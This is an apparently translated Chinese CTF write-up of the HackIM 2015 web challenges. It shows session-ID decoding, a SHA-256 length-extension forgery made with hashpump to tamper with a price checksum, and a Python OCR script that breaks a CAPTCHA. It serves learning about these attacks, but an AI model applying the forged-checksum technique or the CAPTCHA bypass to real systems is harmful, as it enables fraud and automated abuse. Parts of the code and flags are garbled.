HackIM web关writeup

Posted HacTF

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了HackIM web关writeup相关的知识,希望对你有一定的参考价值。

Web100

访问页面将看到下面的错误

技术分享

在burp里使用request / response查看有没有什么不正常的地方。如下图所示,在返回的数据包里被设置了两次不同的phpSESSID。

技术分享

如果我把PHPSESSID改成第一个去请求会怎么样呢?当然没有那么简单,修改之后我发现页面只有“Error Code”有改变。

由于PHPSESSID一直在改变,我把每次返回的第一个PHPSESSID作为下一次请求的PHPSESSID去尝试,burp的Intruder可以实现。

技术分享

技术分享

技术分享

Attack几秒钟之后,我发现返回的Error Code开始重复了,于是我把他们整理到一起。

技术分享

很奇怪的一串字符,但是有点像base64加密,试一下。

1
2
[email protected]:~# echo TnVsbGNvbkdvYTIwMTVAV0VCMDAxMTAw | base64 -d

所以flag是flag{[email protected]}

Web300

访问页面后出现

“Find the keys to your home”和一个到loop.php的超链接

访问连接,里面是一个form表单,还有一个房子的图片。

同时还有个提示<!-- A place to loo[k]::back. -->

loo[k]::back有点像ipv6的格式,ipv6的环回接口(loopback)是::1, or 0:0:0:0:0:0:0:1,这也是这道题的flag。

好吧,虽然不像是一道web题,但我确实是这么解开的。

Web400

以0的价格购买这个商品

打开网页出现下面的页面:

技术分享

点击buy之后会有表单提交,源码如下

1
2
3
4
5
<form action=checkout.php method=POST>
         <input type=hidden name=msg value="Nullcon2015%7Ccorporate%7C10999"><br>
         <input type=hidden name=checksum value="568fe78b29ac377a58ae1fbf02b4d1a158e605b3897916227e4b3ecfc78973db"><br>
        <input type=submit value=Buy>
     </form>

既然要以0的价格购买,我们就要把price改成0,但是我们没法直接修改,因为checksum做了校验。

查看页面源代码,发现下面的注释

1
2
3
4
5
6
7
<!-- 
    if( $checksum === hash("sha256",$secretkey . $msg))   // secretkey is XXXXXXXXXXXXXXXXXXX    :-P
    {
      // Success; :)
    }
  ?> 
   -->

这是length extension 攻击,如果你知道message和MAC,只需再知道key的长度,尽管不知道key的值,也能在message后面添加信息并计算出相应MAC。

使用hashpump来生成一个checksum

token: Nullcon2015|corporate|10999%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01p|0

checksum: a2319d6945201a4b9fd67f077248faff2b735297cca2ac10762af65b2c2dca48

提交之后获得key   

1
2
3
4
5
6
7
8
9
10
HTTP/1.1 200 OK
    Date: Fri, 09 Jan 2015 21:08:38 GMT
    Server: Apache/2.4.7 (Ubuntu)
    X-Powered-By: PHP/5.5.9-1ubuntu4.5
    Vary: Accept-Encoding
    Content-Length: 114
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html
    <h1> Checkout </h1>Congratualtion You bought Nullcon Pass in ZERO rupee. See you at Nullcon!Flag is [email protected]_*2o15}


Web500

唯一获得的提示就是“Break the Captcha”

访问页面

技术分享

就是说需要我们破解验证码

下面是我的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/python
__author__ = "@_SaxX_"
import os, requests, commands, re
= requests.session()
url = "http://54.165.191.231/"
s.get(url + "captcha.php")
while True:
    open(‘captcha.png‘‘wb‘).write( s.get(url + "imagedemo.php").content )
    os.system(‘convert captcha.png -compress none -threshold 16% img.png‘)
    captcha = commands.getoutput("gocr -i img.png").strip()
    response = s.post(url + "verify.php", {‘solution‘ : captcha}).text
    flag = re.findall(‘Score :(.*)‘, response)[0].rstrip()
    if not str(flag).isdigit():
        print "[+] Flag: %s" %flag
        break
print "[%s] Sending Captcha=%s ... "%(flag, captcha)

技术分享

技术分享

执行之后出现flag

 

原文链接:https://ctf-team.vulnhub.com/write-ups/hackim/

 

flag{[email protected][email protected]!09022015}本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。

 



以上是关于HackIM web关writeup的主要内容,如果未能解决你的问题,请参考以下文章

网络信息安全攻防学习平台 上传,解密通关writeup

bugku-writeup-web-源代码

BuuCTF Web Writeup 第二部分

戏说春秋_i春秋 writeup

XCTF-web的writeup(1--4)

MOCTF web writeup